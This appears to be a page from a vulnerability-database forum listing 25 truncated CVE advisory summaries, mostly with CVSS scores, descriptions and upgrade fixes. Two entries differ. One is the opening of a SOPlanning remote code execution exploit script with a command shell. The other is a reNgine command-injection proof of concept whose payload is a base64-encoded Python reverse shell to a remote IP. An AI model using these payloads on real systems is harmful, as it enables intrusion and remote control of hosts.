
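?day POC Vulnerability Database

POC vulnerability database containing all CVEs, POCs and ?day entries from across the web in recent years. It can be connected to the ishack vulnerability scanner via API; some vulnerabilities are visible to members only.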

  1. Microsoft Edge Chromium: CVE-2023-1529 Out of bounds memory access in WebHID Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 03/27/2023 Added 03/27/2023 Modified 01/28/2025 Description Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High) Solution(s) microsoft-edge-upgrade-latest References https://attackerkb.com/topics/cve-2023-1529 CVE - 2023-1529 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-1529

    • 0 replies
    • 45 views
  2. Google Chrome Vulnerability: CVE-2025-0998 Out of bounds memory access in V8 Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0998 Out of bounds memory access in V8 Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0998 CVE - 2025-0998

    • 0 replies
    • 44 views
  3. Ubuntu: (Multiple Advisories) (CVE-2024-42415): libgsf vulnerabilities Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 10/03/2024 Created 10/12/2024 Added 10/11/2024 Modified 01/28/2025 Description An integer overflow vulnerability exists in the Compound Document Binary File format parser of v1.14.52 of the GNOME Project G Structured File Library (libgsf). A specially crafted file can result in an integer overflow that allows for a heap-based buffer overflow when processing the sector allocation table. This can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. Solution(s)…

    • 0 replies
    • 44 views
  4. Ubuntu: (Multiple Advisories) (CVE-2023-28617): Emacs vulnerability Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 03/19/2023 Created 05/05/2023 Added 04/10/2023 Modified 01/28/2025 Description org-babel-execute:latex in ob-latex.el in Org Mode through 9.6.1 for GNU Emacs allows attackers to execute arbitrary commands via a file name or directory name that contains shell metacharacters. Solution(s) ubuntu-pro-upgrade-emacs ubuntu-pro-upgrade-emacs-bin-common ubuntu-pro-upgrade-emacs-common ubuntu-pro-upgrade-emacs-el ubuntu-pro-upgrade-emacs24 ubuntu-pro-upgrade-emacs24-bin-common ubuntu-pro-upgrade-emacs24-common ubuntu-pro…

    • 0 replies
    • 44 views
  5. FreeBSD: VID-68958E18-ED94-11ED-9688-B42E991FC52E (CVE-2023-28636): glpi -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:M/C:P/I:P/A:N) Published 03/20/2023 Created 05/17/2023 Added 05/16/2023 Modified 01/28/2025 Description GLPI is a free asset and IT management software package. Starting in version 0.60 and prior to versions 9.5.13 and 10.0.7, a vulnerability allows an administrator to create a malicious external link. This issue is fixed in versions 9.5.13 and 10.0.7. Solution(s) freebsd-upgrade-package-glpi References CVE-2023-28636

    • 0 replies
    • 43 views
  6. Oracle Linux: CVE-2023-27533: ELSA-2023-6679:curl security update (MODERATE) (Multiple Advisories) Severity 5 CVSS (AV:N/AC:L/Au:N/C:N/I:P/A:N) Published 03/20/2023 Created 07/26/2024 Added 07/22/2024 Modified 11/22/2024 Description A vulnerability in input validation exists in curl <8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and "telnet options" during server negotiation. The lack of proper input scrubbing allows an attacker to send content or perform option negotiation without the application's intent. This vulnerability could be exploited if a…

    • 0 replies
    • 43 views
  7. FreeBSD: VID-A4F8BB03-F52F-11ED-9859-080027083A05 (CVE-2023-28322): curl -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:N/C:P/I:N/A:N) Published 03/21/2023 Created 05/23/2023 Added 05/20/2023 Modified 01/28/2025 Description Details for this vulnerability have not been published by NIST at this point. Descriptions from software vendor advisories for this issue are provided below. From VID-A4F8BB03-F52F-11ED-9859-080027083A05: Wei Chong Tan, Harry Sintonen, and Hiroki Kurosawa reports: This update fixes 4 security vulnerabilities: Medium CVE-2023-28319: UAF in SSH sha256 fingerprint check. Reported by Wei Chong Tan on 202…

    • 0 replies
    • 43 views
  8. # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

    • 0 replies
    • 42 views
  9. Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0997 CVE - 2025-0997

    • 0 replies
    • 42 views
  10. # Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKT…

    • 0 replies
    • 41 views
  11. Debian: CVE-2025-24531: pam-pkcs11 -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/14/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description Possible Authentication Bypass in Error Situations Solution(s) debian-upgrade-pam-pkcs11 References https://attackerkb.com/topics/cve-2025-24531 CVE - 2025-24531 DSA-5864-1

    • 0 replies
    • 41 views
  12. Red Hat: CVE-2023-28164: CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation (Multiple Advisories) Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:C/A:N) Published 03/20/2023 Created 03/22/2023 Added 03/21/2023 Modified 01/28/2025 Description Dragging a URL from a cross-origin iframe that was removed during the drag could have led to user confusion and website spoofing attacks. This vulnerability affects Firefox < 111, Firefox ESR < 102.9, and Thunderbird < 102.9. Solution(s) redhat-upgrade-firefox redhat-upgrade-firefox-debuginfo redhat-upgrade-firefox-debugsource redha…

    • 0 replies
    • 41 views
  13. Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Severity 6 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Solution(s) office-click-to-run-upgrade-latest References https://attackerkb.com/topics/cve-2025-21397 CVE - 2025-21397

    • 0 replies
    • 41 views
  14. PostgreSQL: CVE-2025-1094: PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation Severity 8 CVSS (AV:N/AC:H/Au:N/C:C/I:C/A:C) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/14/2025 Description Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns. Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal. Similarly, i…

    • 0 replies
    • 41 views
  15. Debian: CVE-2023-25751: firefox-esr, thunderbird -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:N/A:C) Published 03/17/2023 Created 03/17/2023 Added 03/17/2023 Modified 01/28/2025 Description Sometimes, when invalidating JIT code while following an iterator, the newly generated code could be overwritten incorrectly. This could lead to a potentially exploitable crash. This vulnerability affects Firefox < 111, Firefox ESR < 102.9, and Thunderbird < 102.9. Solution(s) debian-upgrade-firefox-esr debian-upgrade-thunderbird References https://attackerkb.com/topics/cve-2023-25751 CVE - 2023-25751 DSA-5374-1

    • 0 replies
    • 41 views
  16. FreeBSD: VID-79B1F4EE-860A-11EF-B2DC-CBCCBF25B7EA: gitea -- token missing access control for packages Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 10/06/2024 Created 10/12/2024 Added 10/11/2024 Modified 10/11/2024 Description Problem Description: Fix bug when a token is given public only Solution(s) freebsd-upgrade-package-gitea

    • 0 replies
    • 41 views
  17. Debian: CVE-2022-48424: linux -- security update Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 03/19/2023 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2022-48424 CVE - 2022-48424

    • 0 replies
    • 40 views
  18. Ivanti Pulse Connect Secure: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs) Severity 4 CVSS (AV:L/AC:L/Au:M/C:C/I:N/A:N) Published 02/11/2025 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Cleartext storage of information in Ivanti Connect Secure before version 22.7R2.6 and Ivanti Policy Secure before version 22.7R1.3 allows a local unauthenticated attacker to read sensitive data. Solution(s) pulse-secure-pulse-connect-secure-upgrade-22_7r2_6 References https://attackerkb.com/topics/cve-2024-13843 CVE - 2024-13843…

    • 0 replies
    • 39 views
  19. Debian: CVE-2025-21694: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix softlockup in __read_vmcore (part 2) Since commit 5cbcb62dddf5 ("fs/proc: fix softlockup in __read_vmcore") the number of softlockups in __read_vmcore at kdump time have gone down, but they still happen sometimes. In a memory constrained environment like the kdump image, a softlockup is not just a harmless message, but it can interfere with things like RCU freeing memory, causing the c…

    • 0 replies
    • 39 views
  20. Rocky Linux: CVE-2023-28617: emacs (Multiple Advisories) Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 03/19/2023 Created 03/07/2024 Added 03/05/2024 Modified 01/28/2025 Description org-babel-execute:latex in ob-latex.el in Org Mode through 9.6.1 for GNU Emacs allows attackers to execute arbitrary commands via a file name or directory name that contains shell metacharacters. Solution(s) rocky-upgrade-emacs rocky-upgrade-emacs-common rocky-upgrade-emacs-common-debuginfo rocky-upgrade-emacs-debuginfo rocky-upgrade-emacs-debugsource rocky-upgrade-emacs-lucid rocky-upgrade-emacs-lucid-debuginfo rocky-upgrade-emacs-nox rocky-upg…

    • 0 replies
    • 38 views
  21. Debian: CVE-2025-21697: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Ensure job pointer is set to NULL after job completion After a job completes, the corresponding pointer in the device must be set to NULL. Failing to do so triggers a warning when unloading the driver, as it appears the job is still active. To prevent this, assign the job pointer to NULL after completing the job, indicating the job has finished. Solution(s) debian-upgrade-lin…

    • 0 replies
    • 38 views
  22. Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Severity 6 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Solution(s) microsoft-windows-windows_10-1507-kb5052040 microsoft-windows-windows_10-1607-kb5052006 microsoft-windows-windows_10-1809-kb5052000 microsoft-windows-windows_10-21h2-kb5051974 microsoft-windows-windows_10-22h2-kb5051974 microsoft-windows-windows_11-22h2-kb50…

    • 0 replies
    • 37 views
  23. FreeBSD: VID-F7CA4FF7-E53F-11EF-A845-B42E991FC52E (CVE-2025-1018): mozilla -- multiple vulnerabilities Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/11/2025 Added 02/08/2025 Modified 02/08/2025 Description The fullscreen notification is prematurely hidden when fullscreen is re-requested quickly by the user. This could have been leveraged to perform a potential spoofing attack. This vulnerability affects Firefox < 135 and Thunderbird < 135. Solution(s) freebsd-upgrade-package-mozilla References CVE-2025-1018

    • 0 replies
    • 36 views
  24. PAN-OS: Authentication Bypass in the Management Web Interface Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description An authentication bypass in the Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to bypass the authentication otherwise required by the PAN-OS management web interface and invoke certain PHP scripts. While invoking these PHP scripts does not enable remote code execution, it can negatively impact integrity and confidentiality of PAN-OS. You can greatly reduce the risk of this issue by…

    • 0 replies
    • 36 views
  25. Alma Linux: CVE-2025-1014: Important: firefox security update (Multiple Advisories) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Certificate length was not properly checked when added to a certificate store. In practice only trusted data was processed. This vulnerability affects Firefox < 135, Firefox ESR < 128.7, Thunderbird < 128.7, and Thunderbird < 135. Solution(s) alma-upgrade-firefox alma-upgrade-firefox-x11 alma-upgrade-thunderbird References https://attackerkb.com/topics/cve-2025-1014 CVE - 2025-1014 https://erra…

    • 0 replies
    • 35 views